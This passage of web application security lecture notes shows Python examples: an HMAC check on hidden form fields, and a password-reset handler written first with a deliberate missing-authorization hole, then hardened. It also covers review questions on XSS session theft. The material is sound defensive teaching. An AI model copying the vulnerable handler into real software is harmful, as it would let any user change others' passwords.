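def page_mac(pagename, user):
    """HMAC-SHA256 over the hidden field. The field name and the user are
    included (a design choice for this example) so that a MAC issued for one
    field, or to one user, cannot be replayed in another context."""
    msg = b"\x00".join([b"pagename", pagename.encode("utf-8"), user.encode("utf-8")])
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def hidden_fields(pagename, user):
    """The hidden inputs the edit form carries: the value and its MAC."""
    return {"pagename": pagename, "pagemac": page_mac(pagename, user)}


def render_edit_form(pagename, user):
    """The edit form as sent to the browser."""
    fields = "".join(
        f'<input type="hidden" name="{n}" value="{html.escape(v)}">'
        for n, v in hidden_fields(pagename, user).items())
    return (f'<form method="post">{fields}'
            f'<textarea cols="80" rows="25" name="wpText"></textarea></form>')


def handle_save(form, user):
    """Process the POST. `form` is the submitted fields as a dict (constructed
    by the caller in this example; a framework would parse the body). Accept
    only if pagename is exactly what this server issued to this user."""
    pagename = form.get("pagename", "")
    presented = form.get("pagemac", "")
    expected = page_mac(pagename, user)
    # Constant-time comparison on bytes: compare_digest on str raises on
    # non-ASCII input, and the presented value is attacker-controlled.
    if not hmac.compare_digest(presented.encode("utf-8"), expected.encode("utf-8")):
        return 400, "hidden field missing or tampered with"
    return 200, f"saving {pagename}"
```

Changing pagename, dropping pagemac, or submitting another user's form all fail the check, while the textarea content is free to change because it was never covered by the MAC.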

Other authorization mistakes

Assuming requests occur in proper order
É For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve the form before the POST
É only checking authorization on the first step

Authorization by obscurity
É Supposing that because a web page is not linked to from the main site, only people who are given its URL will be able to reach it

  http://www.myserver.com/secretarea/privatepaper.pdf

  URLs leak through browser history, Referer headers, proxy and server logs, and guessing; they are not credentials.
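The ordering mistake and its fix, as an added Python example (not code from the lecture). The vulnerable pair guards the GET and lets the POST assume the form was fetched by an administrator; the hardened pair puts the same check in front of every step, so the order of requests no longer matters. The user table, password store and the tiny `Request` and `dispatch` stand-ins are assumptions for the example.

```python
from functools import wraps

# Constructed sample data (assumption): who is an administrator, and the
# account whose password an attacker would like to set.
USERS = {"root": {"admin": True}, "mallory": {"admin": False}}
PASSWORDS = {"victim": "original"}


class Request:
    """Minimal stand-in for a framework request object (assumption)."""
    def __init__(self, method, user, form=None):
        self.method, self.user, self.form = method, user, form or {}


def is_admin(user):
    return USERS.get(user, {}).get("admin", False)


# --- the mistake: the GET is guarded, the POST assumes the GET happened ---
def reset_get_vulnerable(req):
    if not is_admin(req.user):
        return 403, "forbidden"
    return 200, '<form method="post">...</form>'


def reset_post_vulnerable(req):
    # No check: "only an admin could have fetched the form". Nothing stops a
    # client from sending the POST without ever requesting the form.
    PASSWORDS[req.form["account"]] = req.form["password"]
    return 200, "password changed"


# --- the fix: the same check on every step, with no reliance on order ---
def require_admin(handler):
    @wraps(handler)
    def guarded(req):
        if not is_admin(req.user):
            return 403, "forbidden"
        return handler(req)
    return guarded


@require_admin
def reset_get(req):
    return 200, '<form method="post">...</form>'


@require_admin
def reset_post(req):
    PASSWORDS[req.form["account"]] = req.form["password"]
    return 200, "password changed"


def dispatch(routes, req):
    """Route by HTTP method the way a small framework would; each handler
    is responsible for its own authorization."""
    return routes[req.method](req)


VULNERABLE = {"GET": reset_get_vulnerable, "POST": reset_post_vulnerable}
HARDENED = {"GET": reset_get, "POST": reset_post}
```

A non-admin who sends the POST directly changes the password under the vulnerable routes and is refused under the hardened ones; the check is cheap, so applying it to every handler costs nothing and removes the hidden dependency on request order.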

Outline

Overview

Essential Basics: URLs

Output Filtering and XSS

Object references

Summary

Review questions

URLs
É Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?

XSS
É Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references
É Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts

É Innocent Code: A Security Wake-Up Call for Web Programmers, by Sverre H. Huseby. Wiley, 2004.
É The Tangled Web: A Guide to Securing Modern Web Applications, by Michal Zalewski. No Starch Press, 2012.

as well as the named RFCs.
